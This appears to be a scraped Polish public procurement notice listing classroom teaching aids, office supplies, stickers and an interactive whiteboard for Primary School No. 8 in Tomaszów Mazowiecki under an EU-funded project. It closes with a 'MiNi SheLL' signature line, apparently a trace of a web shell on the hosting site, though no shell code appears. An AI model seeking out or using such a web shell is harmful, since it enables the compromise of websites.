Wiem jak pomóc. Plansze magnetyczne Wiem jak pomóc to niezbędna pomoc edukacyjna w czasie zajęć doskonalących wiedzę o zasadach bezpiecznego zachowania oraz prawidłowego reagowania w sytuacjach zagrożenia zdrowia lub życia. 5 plansz magnetycznych z czerwoną ramką (sytuacje niebezpieczne), 3 plansze magnetyczne z niebieską ramką ( sposoby wzywania pomocy w sytuacjach zagrożenia) 4 małe plansze magnetyczne ( z numerami telefonów alarmowych-ilość 2;
Bezpieczeństwo wokół nas.  Pomoc edukacyjna do pracy indywidualnej lub grupowej. - 35 elementów tworzących 7 historyjek obrazkowych; 4 elementy pozwalające dokonywać oceny zachowania (2 światła zielone - ocena pozytywna; 2 światła czerwone - ocena negatywna) 1 element ze znakiem ? pozwalający na wprowadzenie własnych pomysłów rozwiązań danej sytuacji problemowej-ilość 2;
Leniwa ósemka. Tor wykonany z drewna, w kształcie leżącej ósemki. Zamontowane rączki umożliwiają łatwe manipulowanie przyrządem, a głębokie wyżłobienie zapobiega wypadaniu piłki z toru. Zabawa labiryntem ma korzystny wpływ na koordynację wzrokowo-ruchową, wewnętrzną harmonię organizmu. - wym. 48x22x2,5cm - śr. kulki 3cm-ilość 2; Lalki Emocje smutek (w zestawie)-ilość 1; Lalki Emocje radość (w zestawie)-ilość 2;
Lalki Emocje strach (w zestawie)-ilość 1;
Lalki Emocje zadowolenie (w zestawie)-ilość 2;
Lalki Emocje złość (w zestawie)-ilość 1;
Pan Twarz - makatka. Wym. 50x70 cm, 22 ruchome elementy-ilość 1;
Pan Twarz - kostka (kostka bok 20 cm)-ilość 1;
Pani Twarz - makatka. Wym. 50x70 cm-ilość 1;
Pani Twarz - kostka. Kostka bok 20 cm, pianka obszyta materiałem-ilość 1;
Poznajemy emocje: kukiełki z płytą. Zawartość:  4 pacynki dwustronne emocje, 2 pacynki dodatkowe, płyta CD audio MP3 w jęz. polskim, instrukcja-ilość 2;
Szablony - twarz i emocje. Zawartość: 6 szablonów z tworzywa
wymiar 20 x 20 cm, instrukcja metodyczna-ilość 2;
Dobre i złe zachowanie: seria kart W grupie. Zawartość: 34 karty (9x9cm), tektur grub. 2.5 mm, instrukcja-ilość 2;
Dobre i złe zachowanie: seria kart W domu. Zawartość: 34 karty (9 x 9 cm), gruba tektura, instrukcja-ilość 2;
Dobre i złe zachowanie: seria kart Bezpieczeństwo. Zawartość: 34 karty (9 x 9 cm), gruba tektura, instrukcja-ilość 2;
Rozwiązujemy konflikty: seria kart W domu. Zawartość: 30 kolorowych kart (16,5 x 13,5 cm), karty tworzą 7 historyjek, 
CD z nagraniem w języku polskim, instrukcja-ilość 1;
Rozwiązujemy konflikty: seria kart W szkole. 30 kolorowych kart (16,5 x 13,5 cm), karty tworzą 7 historyjek, CD z nagraniem w języku polskim, instrukcja-ilość 1;
Rozwiązujemy konflikty: seria kart Kłamstwa. Zawartość: 30 kolorowych kart (16,5 x 13,5 cm), karty tworzą 7 historyjek, CD z nagraniem w języku polskim, instrukcja-ilość 1;
Klocki CLICS: nr 030-7200. Zawartość: klocki 1000 sztuk
z planem budowy-ilość 1;
Lego System-komplet klocków. Zawartość: 884 klocki LEGO System - w kartonie-ilość 2;
4) Wykaz pomocy dydaktycznych na zajęcia matematyczne:
Górska ścieżka -Drewniany labirynt do zabaw zręcznościowych, indywidualnych, w parach i grupowych Pomoc zapewnia doskonałą zabawę, a jednocześnie pozytywnie wpływa na rozwój dziecka. Dziecko ćwiczy koncentrację i koordynację wzrokowo-ruchową, rozpręża się i relaksuje. Labirynt jest składany, łatwy  w przechowywaniu, 3 kolorowe kulki, wym. 59 x 120 cm-ilość 1;
Magnetyczne ułamki - Doskonała pomoc do poznania najważniejszych właściwości ułamków. Duże listwy o jednakowej długości podzielono na części, aby zobrazować całość oraz ułamki 1/2, 1/3, 1/4, 1/5, 1/6, 1/8, 1/10 i 1/12. Listwy wykonane są z estetycznego, wytrzymałego tworzywa w atrakcyjnych kolorach, wystarczą na długie lata interesującej nauki. Zestaw ten znacznie ułatwia dzieciom opanowanie tego trudnego działu matematyki, zrozumienie abstrakcyjnych pojęć i działań związanych z ułamkami, 9 różnych kolorów, od 1/1 do 1/12, wym. 1/1 100 x 10 cm-ilość 2;
Tangram magnetyczny - 3 kolory. - Trzy komplety tangramu wykonane z mocnej folii magnetycznej. Stanowią idealną pomoc dydaktyczną dla nauczyciela do prowadzenia uczniów pracujących ze swoimi tangranami na stolikach; 3 komplety tangramu po 7 elementów każdy, wymiar kwadratu tangramu 20 cm-ilość 3;
ZESTAW-magnetyczna kasetka+2komplety kart  Praktyczny zestaw do przeprowadzenia 180 ćwiczeń w dodawaniu, odejmowaniu i porównywaniu liczb w zakresie 20. Zawartość:1x kasetka magnetyczna (nr115-1030), 1x karty zadaniowe cz.1 (nr 115-1031), 1x karty zadaniowe cz.2 (nr 115-1032)-ilość 10
Podłogowa oś liczbowa 0-30 - Za pomocą tej maty cała klasa może ćwiczyć liczenie, dodawanie i odejmowanie w aktywnym ruchu. Oś liczbowa w układzie poziomym prezentuje liczby od 0 do 30 z lewej na prawą. Liczby nieparzyste i parzyste oznaczone odmiennym kolorem, odpowiednio - czerwonym i niebieskim. Poza doskonaleniem umiejętności arytmetycznych dzieci rozwijają także swoją koordynację ruchową.Zawartość:mata z wytrzymałego winylu - wym. 660 x 30 cm-ilość 2;
Tangram klasowy-24 komplety - Tradycyjna chińska łamigłówka logiczna dla całej klasy. Zapewnia naukę geometrii w formie atrakcyjnej, angażującej zabawy. Układanie tangramów rozwija logiczne myślenie i kształtuje intuicję geometryczną. Układanka stanowi nieocenione uzupełnienie atrakcyjnych zajęć na lekcjach matematyki na każdym poziomie kształcenia, niezależnie od stosowanych podręczników i programów nauczania.
Zawartość: 24 komplety tangramów (po 7 elementów każdy) - łącznie 168 elementów w 4 kolorach - wymiar kwadratu 10 x 10 cm - grubość tworzywa 2 mm - bawełniany woreczek-ilość 1;
Komplet 6 pojemników do badania objętości. Zawartość:
6 zbiorników z trwałego przeźroczystego tworzywa
pojemność zbiorników od 0,25 do 1 litra
wysokość 11 cm całość umieszczona w estetycznym i trwał ym kartonie-ilość 4;
Magnetyczny zegar demonstracyjny - Duży zegar z tworzywa sztucznego o średnicy 41 cm. Cztery mocne wbudowane magnesy pozwalają przymocować zegar do tablicy-ilość 1;
Uczniowska tarcza zegarowa 13 cm - Tarcza uczniowska wyposażona w system kół zębatych i podpórkę. Kolorystycznie zgodna z popularnym magnetycznym zegarem demonstracyjnym (nr 175-1070). Koła zębate zapewniają synchroniczny ruch wskazówek tarczy.
Zawartość:
1 sztuka, średnica tarczy 13 cm-ilość 25;
Klocki przestrzenne - plastikowe 180 elementów w formie: trójkątów, kwadratów, pięcioboków i sześcioboków (4 kolory: żółty, czerwony, niebieski i zielony)-ilość 1;
Matematyczne rozgrywki - zestaw gier rozwijających podstawowe umiejętności istotne w uczeniu się matematyki. Zestaw zawiera 6 plansz, 40 kart matematycznych do gry, domino, żetony, 2 kostki i 4 pionki, książeczka z opisem 48 gier-ilość 2;
Układanki trójkątne - Dodawanie do 1000 24 trójkątne elementy. Forma układanki , w której obowiązują zasady domina-ilość 2;
Układanki trójkątne - Odejmowanie do 1000  24 trójkątne elementy. Forma układanki , w której obowiązują zasady domina-ilość 2;
Układanki trójkątne - Dzielenie do 1000  24 trójkątne elementy. Forma układanki , w której obowiązują zasady domina-ilość 2;
Mnożę i dzielę - 45 gier matematycznych dla dzieci w wieku szkolnym. Zestaw zawiera 5 plansz, 19 arkuszy z elementami gier do wycięcia., 2 kostki, książkę z opisami-ilość 1;
Ułamki w kole - śr. 10cm, pudełko z tworzywa. Pudełko zawiera 5 kolorowych kół z tworzywa, podzielonych na 1/2, 1/3, 1/4, 1/6, 1/8 oraz całe koło-ilość 2;
Ułamki w kwadracie - wym. 10cm. Elementy z tworzywa sztucznego. Zawiera 7 kwadratów podzielonych na 1/2, 1/3, 1/4, 1/6 w kilku kombinacjach-ilość 2;
Ułamki tabliczka - listwy reprezentujące części ułamkowe. 51 kolorowych elementów z tworzywa, wym. 23x20,5cm-ilość 10;
Miarki elastyczne - elastyczne taśmy, dł. 1m, zestaw 5 sztuk-ilość 2;
Domino Mnożenie - gra oparta na klasycznym dominie. Trzy stopnie trudności oznaczone różnymi kolorami, 36 plastikowych kart-ilość 5;
Waga wielofunkcyjne posiada plastikowe pojemniki. Wym. 13x37x14cm, poj. pojemnika = 0,5 litra (z podziałem od 100 do 500ml)-ilość 2;
Zestaw odważników w pudełku 10 odważników 2x 1g, 2x2g, 2x5g, 2x10g, 1x20g,1x50g-ilość 2;
5) Wykaz pomocy dydaktycznych na zajęcia przyrodniczo-ekologiczne:
Ekologiczny  recykling-gra, walizka z 5pojemnikami(20x19xx10),35 fot.(6,1x6,1)-ilość 1;
Globus krajobrazowo- zoologiczny; śr. 220mm dołączona broszura o życiu zwierząt-ilość 1;
Globus z kontynentami- nadmuchiwana piłka  śr. 69cm	-ilość 1;
Laboratorium  badawcze-Rozmiar: 36 x 23 x 20,5 cm-ilość 1;
Liście i owoce drzew-komplet pudełko 10 szt. duże stemple śr.7,5 cm-ilość 1;
Piłka dmuchana  segregacja śmieci- dmuchana piłka z nadrukami różnych przedmiotów, uczy segregacji odpadów.(brak danych o wymiarach )-ilość 1;
Prasa do suszenia okazów-sklejka+ śruby motylki wym. 14,5x14,5x4cm-ilość 1;
Preparaty  mikroskopowe  I  25szt. preparatów biologicznych w drewnianym pudełku-ilość 1;
Preparaty  mikroskopowe  II 50szt.preparatów biologicznych w drewnianym pudełku-ilość 1;
Pudełko zdjęć- zwierzęta-ilość 1;
Sortujemy  śmieci -     gra ekologiczna pudło wym.25,5x19x9cm-ilość 1;
Stacja hydroponiczna-Zawartość: 3 próbki z tworzywa odpornego na załamania (wys. 18 cm, śr. 4,5 cm) - 3 podpórki do roślin - 3 sitka na nasiona - instrukcja-ilość 1;
Układ słoneczny i gwiazdozbiory-model przestrzenny  9 planet umieszczonych na kolumnie;dł.34,5;szer.26 cm; wys.17.cm.Dziala na 4 baterie R-14-ilość 1;
Układ słoneczny-zestaw nadmuchiwany;9 nadmuchiwanych piłek- planet o różnej średnicy zaopatrzonych w haczyki. Całość zapakowana w kartonowe pudełko-ilość 1;
Duże stemple- pogoda-10stempli wym.7,5cm z uchwytami-ilość 1;
Preparaty mikroskopowe- kropla wody pełna życia- 10 preparatów bakterii, glonów, pierwotniaków  w drewnianym pudełku(brak wymiarów)-ilość 1;
Biodegradacja- zestaw doświadczalny  A) Pojemniki testowe -6 szt., przezroczyste; w pokrywce otwory wentylacyjne, regulowane. (B) Ramki do pojemników z przyczepami (6 szt.) lub klatką (patrz: F). (C) Zestaw T- próbek różnych metali i plastików do testowania (po 6 sztuk każdej próbki): plastik biodegradowalny w zimnej wodzie; plastik biodegradowalny w gorącej wodzie; karton z pulpy papierowej 2- i więcej warstwowy; miedź; metal puszkowy - cyna; aluminium (glin). (D) Próbki folii - przykład plastiku szybko biodegradowalnego (rozpuszczają się w zimnej wodzie). (E) Ramki zatrzaskowe (6 szt.) do umieszczania próbek testowych (np. fragmentów gazet, liści, folii, itp.). (F) Ramka z otwartą (6 szt.) lub zamkniętą klatką (6 szt.) do testowania próbek (np. organicznych)-ilość 1;
Filmy DVD-Typy siedliskowe lasów- Bory i lasy mieszane; czas (25min 58 sek)-ilość 1;
Film DVD -Leśne drzewa- opowieść o życiu drzewa, poznanie pracy leśnika; czas 13 min 38 sek-ilość 1;
Film DVD -Odnawialne źródła energii- przedstawienie praktycznych rozwiązań wykorzystania odnawialnych źródeł energii; czas 21 min 15 sek-ilość 1;
Komplet 12 lup na podstawku-   4 szt. o 50mm;   4szt. o  65mm;  4szt. o 75mm; wszystkie umieszczone  na plastykowej podstawce-ilość 1;
Model czaszki ludzki 3 częściowy -model czaszki ludzkiej naturalnej wielkości(3 części) z ruchomą żuchwą-ilość 1;
Model do higieny jamy ustnej- miękki- do nauki prawidłowej higieny jamy ustnej, zrobiony z elastycznego tworzywa, nakładany na dłoń ćwiczącego, dołączono szczoteczkę-ilość 1;
Model szkieletu człowieka -model łącznie 200 kości, ruchoma żuchwa, na stojaku wykonany z bardzo twardego tworzywa sztucznego; wys. 85 cm-ilość 1;
Model tułowia człowieka z głową, 11części 1/2 wielkości naturalnej , wyk z bardzo twardego tworzywa, wyjmowane części: 2 polówki czaszki,mózg,2 płuca,2 częściowe serce, żołądek, wątroba z pęcherzykiem żółciowym. Wys.50cm-ilość 1;
Model ucha  ludzkiego (mod. podstawowy)- powiększenie 3x, z przekrojem ucha wewnętrznego; na podstawie.  Wym. 34x16x19-ilośc 1;
Model zęba trzonowego z próchnicą. Model powiększony 8x , rozkładany na 2 części, na podstawie. Wym. 19x12x12 cm-ilość 1;
Układ słoneczny-modele magnetyczne-ilość 1;
Mikroskop VISOMAR  C Dane techniczne:
- głowica monokularowa
- najmniejsze powiększenie: 40x
- największe powiększenie: 1024x
- obiektywy: 4x/10x/40x
- okulary: 10x, 16x i soczewka BARLOWA
- zasilanie: 5V - zasilacz
- stolik przedmiotowy prostokątny
- płynna regulacja natężenia światła górnego i dolnego
- masa: 1,5 kg-ilość 4;
Film DVD -Parki Narodowe;2006;czas   Tatrzański PN, Bieszczadzki PN, Białowieski PN, Gorczański PN; (4x56)-ilość 1;
Film DVD -Planeta Ziemia-  2007;Od bieguna do bieguna,(49),Zmiany globalne(52), Jaskinie(49)-ilość 1;
Film DVD - Prawda o zmianach klimatu- 2006 ;seria 5 filmów; Czy możemy ocalić Ziemię?(30),Czy zmieniamy naszą planetę?(30),Globalne ocieplenie (23), Pokonać żywioły ,(49); Życie na cieplejszej planecie (14);2009-ilość 1;
Film DVD Tajemny świat ogrodów - reż D. New, Susan  Flaming  ( 4x22), 2002-ilośc 1;
Film DVD Profesor    Ciekawski -red. M. Uberman, ;Powietrz I cz.(20),Powietrze II cz.(19),Woda (20), Ogień (20), Ziemia(20)prod.2000-ilość 1;
Film DVD Tajemny  świata ogrodów- reż. David New; prod. 2004, cykl filmów o zwierzętach żyjących w ogrodach. (7x22)-ilośc 1;
Film DVD Życie Bałtyku -reż.J. Abramowicz 2008;życie fauny i flory bałtyckiej, podwodne wraki, rezerwaty- 9 x20 -ilość 1;
Puzzle jaki to miesiąc? 36 elementów-ilośc 2;
Kota Ptysia potyczki z przyrodą. Zeszyt A4 zawiera 18 kart-ilość 2;
Ciało człowieka. 16 kartonowych stron, format 280/290 cm-ilość 2;
Puzzle Nasze ciało. 35 elementów wym. 36.5/28.5 cm-ilość 2;
Puzzle Polska mapa polityczna.70 elementów format 36.5/28cm-ilość 2;
Puzzle Polska mapa fizyczna 61 elementów format 36,5/28,5-ilość 2;
Szanujemy przyrodę. 5 elementów tworzących 5 historyjek obr.-ilość 2;
Plansza edukacyjna - zwierzęta. 40 arkuszy wym. 21/29.7 cm-ilość 2;
Drzewa naszych lasów. 19 plansz wym. 48/32cm-ilość 1;
Plansze edukacyjne-pory roku i miesiące. wym. 61/86 cm-ilość 2;
Plansza edukacyjna-zjawiska. wym. 61/86 cm-ilość 2;
Makatka drzewo na 4 pory roku.39 elementów ruchomych-ilość 1;
6) Wykaz pomocy dydaktycznych na zajęcia humanistyczno - teatralne:
Skrzynia z przebraniami dla dziewczynek-15 elementów z nylonu-ilość 1;
Skrzynia z przebraniami dla chłopców-11 elementów z nylonu-ilość 1;
Kapelusze dla dziewczynek -4 sztuki, tiul, aksamit-ilość 1;
Kapelusze dla chłopców-4 sztuki, filc, aksamit-ilość 1;
Parawan Kolorowy teatrzyk-wym.87x168cm-ilość 1;
Torba z pacynkami-14 pacynek, wymiary torby64x94cm.-ilość 1;
Pacynki bajki- zestaw 4 szt. wymiar 25 cm.-ilość 1;
Teatrzyk stragan-wymiary:53x117cm, drewno, tkanina-ilość 1;
Skrzydła anioła-dł.57cm,wykonane z tkaniny, szelki z gumy-ilość 1;
Pomysły na makijaż dla dzieci-format książki:14,8x21cm, 32str.-ilość 1;
Kostiumy Gospodarstwo-4 kostiumy zwierząt, płytaCD, książka do przedstawienia-ilość 1;
Pomadki do malowania twarzy-6 kolorów:bezpieczne dla dzieci-ilość 1;
Domek zabaw- teatrzyk-tkanina poliestrowa,wymiar:135x95x75cm,2 pacynki, torba-ilość 1;
Inscenizacje w nauczaniu zintegrowanym wyd. Harmonia, 96 stron, płytaCD-ilość 1;
Pani na opak-15 miniatur scenicznych, wyd.Impuls,104 strony-ilość 1;
Z Kacprem przez cały rok-18 przedstawień kukiełkowych, wyd,Jedność,94 strony-ilość 1;
Czarodziejski pyłek-scenariusze zajęć, wyd.Impuls,74 strony	-ilość 1;
Bajki grajki Czerwony Kapturek płyta CD, 14 min-ilość 1;
Bajki grajki Nowe szaty cesarza płyta CD, 20 min-ilość 1;
Bajki grajki -O Janku Wędrowniczku, płyta CD, 21 min-ilość 1;
Bajki grajki - Alicja w Krainie Czarów, płyta CD, 44 min	-ilość 1;
Bajki grajki - Kot w butach, płyta CD,14 min-ilość 1;
Bajki grajki - Kopciuszek, płyta CD, 4 min-ilość 1;
Bajki grajki - Stoliczku nakryj się, plyta CD, 44 min-ilość 1;
Bajki grajki -  Pinokio, płyta CD, 44 min-ilość 1;
Bajki grajki - Przygody Piotrusia Pana, płyta CD, 41 min-ilość 1;
Bajki grajki - Księżniczka na ziarnku grochu, plyta CD, 20 min-ilość 1;
Bajki grajki -Ali baba i czterdziestu rozbójników, płyta CD, 12 min-ilość 1;
Bajki grajki - Kubuś Puchatek, płyta CD, 54 min-ilość 1;
Bajki grajki - Brzydkie kaczątko, płyta CD, 12 min-ilość 1;
Bajki grajki - Jaś i Małgosia,płyta CD, 13 min-ilość 1;
Bajki grajki - Przygody Tomka Sawyera, płyta CD, 57 min-ilość 1;
Bajki grajki - Muchy króla Apsika, płyta CD, 57 min-ilość 1;
Bajki grajki - Chatka Puchatka, płyta CD, 41 min-ilość 1;
Bajki grajki - O krasnoludkach i sierotce Marysi, płyta CD, 44 min-ilość 1;
Bajki grajki - Calineczka, płyta CD, 49 min-ilość 1;
Bajki grajki -Ośla skórka, płyta CD, 48 min-ilość 1;
Ilustrowany słownik wyrazów obcych dla dzieci książka, 128 s., Poznań 2010-ilość 5;
Ilustrowany słownik frazeologiczny dla dzieci książka, 128 s., Poznań, 2010-ilość 5;
Bajki grajki - Legendy: O Bazyliszku, O sielankowym królu  płyta CD, 39 min-ilość 1;
Bajki grajki - Legendy: O Bazyliszku, O sielankowym królu zeszyt-ilość 1;
Bajki grajki -  Poszukiwacze złota, płyta CD, 41 min-ilość 1;
Bajki grajki -  Poszukiwacze złota zeszyt-ilość 1;
Bajki grajki Pan Twardowski na kogucie, płyta CD, 39 min-ilość 1;
Bajki grajki Pan Twardowski na kogucie zeszyt-ilość 1;
Bajki grajki - Dziadek do orzechów płyta CD, 72 min-ilość 1;
Bajki grajki - Dziadek do orzechów zeszyt-ilość 1;
Bajki grajki- Noc u Wedla, płyta CD, 12 min-ilość 1;
Bajki grajki- Noc u Wedla zeszyt-ilość 1;
Bajki grajki - Przygody Koziołka Matołka Cz. III, IV, płyta CD, 49 min-ilość 1;
Bajki grajki - Przygody Koziołka Matołka Cz. III, IV zeszyt-ilość 1;
Bajki grajki- Legendy: Wars I Sawa, Smok ze Smoczej Jamy płyta CD, 48 min -ilość 1;
Bajki grajki- Legendy: Wars I Sawa, Smok ze Smoczej Jamy zeszyt-ilość 1;
Bajki grajki- Legendy: O złotej kaczce, O czarodziejskim młynku, płyta CD, 42 min	-ilość 1;
Bajki grajki-Legendy: O złotej kaczce, O czarodziejskim młynku zeszyt-ilość 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Materiały biurowe zużywalne, naklejki samoprzylepne z logo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup materiałów biurowych zużywalnych oraz naklejek z logo na zajęcia dodatkowe dla uczniów Szkoły Podstawowej nr 8 w Tomaszowie Mazowieckim, dla której organem prowadzącym jest Gmina Miasto Tomaszów Mazowiecki w ramach projektu systemowego w zakresie indywidualizacji procesu nauczania i wychowania uczniów klas I-III pn. Zdobywcy świata współfinansowanego przez Unię Europejską 
w ramach Europejskiego Funduszu Społecznego.
1. Wykaz materiałów biurowych zużywalnych:
Bibuła karbowana w rolkach 8 kolorów o  wym.50cm x 200cm-24 szt.; Karton A4-100 mix gram.170g/m2,o wym.210x297,10 kolorów po 10 arkuszy-5 szt.; Brystol kolorowy A4 gram.170g/m2 o wym.210x297, 5 kolorów 150 arkuszy-1	szt.; Farby- zestaw do malowania palcami, pojemniki 1000 ml. 6 kolorów w zestawie-1 szt.; Papier ksero standard A4, ryza 500 ark. biały, gram.80mg/m2	- 6 ryz; Klej biurowy w sztyfcie, biały 35g-10 szt.; Pastele olejne 16 kol.typu PENTEL, w pudełku kartonowym-8 op.; Pastele suche 6 kol. Typu KOHINOR, w pudełku kartonowym -8 op.; Zeszyt papierów kolorowych, metalizowany 7ark. 7 kolorów. wym .230x165-5	szt.; Papier mix A4 kolorowy 500 ark.o wym.210x297mm gram. 80 g/m2, 5 kolorów- 2 szt.; Karton B1 mix kolorów o wym.700x1000 , gram. 270g/m2- 1 op.; Plastelina 6 kolorów w opakowaniu	-10 op.; Kredki ołówkowe typu typu Jumbo śr.6 mm , 12 kolorów w opakowaniu	-6 op.
2. Naklejki samoprzylepne z logo:
Naklejki samoprzylepne, wymiar 5x7 cm, z kolorowymi logotypami i odniesieniem słownym;
Kapitał Ludzki
Narodowa Strategia Spójności
Unia Europejska 
Europejski Fundusz Społeczny
Na naklejce umieszczone napisy tj:
na środku naklejki: Projekt Zdobywcy świata
na dole naklejki: Zakup współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego- 300 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.44-2, 44.81.23.00-8, 37.82.21.00-7, 22.81.60.00-3, 37.82.22.40-0, 30.19.28.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Tablica interaktywna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakup tablicy interaktywnej na zajęcia dodatkowe dla uczniów Szkoły Podstawowej nr 8  w Tomaszowie Mazowieckim, dla której organem prowadzącym jest Gmina Miasto Tomaszów Mazowiecki w ramach projektu systemowego w zakresie indywidualizacji procesu nauczania i wychowania uczniów klas I-III pn. Zdobywcy świata współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
Tablica interaktywna o parametrach:
a) Przekątna wymiaru interaktywnego min. 178 cm. (70cali), 
b) Proporcje obrazu: standard,  4:3,                        c) Technologia pozycjonowania w podczerwieni, 
d) Paski skrótów po lewej i prawej stronie,                   e) Obsługa tablicy palcem lub dowolnym innym przedmiotem, 
f) Połączenie z komputerem kabel USB, Zgodność z systemami operacyjnymi Windows XP 2003/Vista/7 (32 i 64 bit), 
g) Dokumentacja użytkownika w języku polskim, 
 Instrukcja w języku polskim, 
h) W zestawie integralna pólka i kabel USB 5m. do podłączenia tablicy z komputerem oraz w  komplecie kompatybilny, ruchomy stojak na kółkach z możliwością regulowania wysokości położenia  tablicy interaktywnej - ilość 1 sztuka
Dostawa: Szkoła Podstawowa nr 8 w Tomaszowie Mazowieckim, ul. Stolarska 21/27..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.32.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com